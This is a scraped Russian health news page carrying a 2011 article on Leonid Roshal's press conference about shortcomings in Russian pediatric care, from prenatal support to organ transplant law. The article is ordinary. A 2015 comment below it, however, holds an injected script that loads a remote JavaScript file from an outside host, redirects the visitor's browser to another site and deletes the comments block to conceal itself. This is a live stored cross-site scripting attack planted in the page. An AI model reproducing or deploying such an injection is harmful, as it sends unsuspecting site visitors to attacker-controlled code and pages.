Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Где ты, детство золотое?  >>  Где ты, детство золотое?
 
Обратная связь
 

Где ты, детство золотое?

Размер шрифта
31 мая 2011 02:19
  • google_analytics: false
  • Нравится

Накануне Дня защиты детей президент Национальной медицинской палаты Леонид Рошаль встретился с журналистами и рассказал о том, чем можно гордиться и чего надо стыдиться в современной отечественной педиатрии.



Екатерина Олейникова / «Здоровье инфо»

О детях в нашей стране вспоминают так же часто, как о женщинах и ветеранах. Раз в год по праздникам. Как правило под лозунгом «Все лучшее – детям» объявляется о старте громких проектов. Однако стоит посмотреть вокруг себя, чтобы убедиться: у российской детской медицины большие проблемы на всех этапах взросления ребенка, от внутриутробного развития до призывного возраста. На состоявшейся конференции доктор Рошаль вместо того, чтобы хвастаться достижениями, призвал общественность обратить внимание на самые больные места в детском здравоохранении.

Дородовый период
 
– Нет системы подготовки будущих родителей к главному событию в жизни, – заявил доктор Рошаль. – Основной источник информации для будущей мамы – это Интернет. Немногие мамы не могут позволить себе дорогие курсы по подготовке к родам. Кроме того, в стране полностью отсутствует система дородового патронажа. Неблагополучная семья существует без всякого надзора со стороны властей и всякой помощи от социальных служб. В результате в семьях алкоголиков и наркоманов рождаются дети с функциональными отклонениями. Этот поток детской инвалидности никто и ничто не сдерживает. 
 
Родовой период
 
Говоря о положении в этой области, доктор признал, что в России, наконец, научились выхаживать недоношенных маловесных детей.
 
– Однако и в этой сфере у нас все «как всегда», – заметил Рошаль. – Катастрофически не хватает перинатальных центров. Матерям в отдаленных уголках страны иной раз приходится ехать на роды за сто километров, а то и больше. Большинство роддомов нуждается в нормальном оборудовании. Как можно доверять роддому, в котором нет необходимых приборов для реанимации и выхаживания новорожденных? Маломощные вентиляторы в аппаратах искусственной вентиляции легких, недостаточно химикатов в лабораториях, а значит, точность анализов – под вопросом. Да что там! Специально обученного персонала – тоже нет. Но мы упрямо продолжаем гордиться достижениями, закрывая глаза на трудности. 
 
Послеродовой период

Необходима социальная реклама, пропагандирующая грудное вскармливание. У матери должна быть возможность сравнить: что получает ребенок-искусственник, и что получает грудничок. Пока же мать лишена доступа к этой информации и выбирает то, что удобней для нее. В итоге страдает ребенок.  

Ситуацию с квотами на лечение детей доктор Рошаль назвал «позором» для страны. Во всем мире дети до 12 лет получают государственные дотации на лекарства. Российская же семья остается с болезнью своего ребенка один на один и вынуждена собирать деньги по фондам и формумам в Интернете.

Трансплантация детских органов – еще один острый вопрос. До сих пор не существует четкого критерия, когда наступает смерть мозга. Нет системы юридических документов, которая давала бы четкую инструкцию, как поступать при несчастном случае с телом и органами. У человека должна быть возможность составить документ и распорядиться своими органами на случай, если вдруг что-то произойдет. «Я первым подпишу такой документ! – заявил Леонид Рошаль. – Если со мной что-то случится за рулем, и если кому-то мой орган пригодится, пожалуйста, берите». 
 
В завершении пресс-конференции доктор Рошаль ушел от ответа на вопрос о своем конфликте с министром Минздравсоцразвития, который разгорелся в апреле этого года и выразился предельно коротко:

– Ситуацию комментировать не буду. Ее комментирует народ.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Скажите ребенку, что овощи – это вредно. Тогда он будет есть только их!   Кесарю кесарево, а ребенку, родившемуся с помощью кесарева сечения, лишний вес!   ВИЧ и беременность. Как защититься?   Что нормально во время беременности?  
05 декабря 2012Когда вы нервничаете, ваш ребенок толстеет 26 ноября 2012Бесчувственный язык – причина ожирения
 
06 ноября 2012Подростки не могут побороть страх 22 октября 2012Детское ожирение – причина рака
 

Слайдшоу

1
Энурез у детей
Как меняется жизнь после родов
Детские болезни, которые должна знать каждая мама. Часть 1

Тесты

Что вы знаете о грудном вскармливании?
Что вы знаете об СДВГ?
Сколько вы проживете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.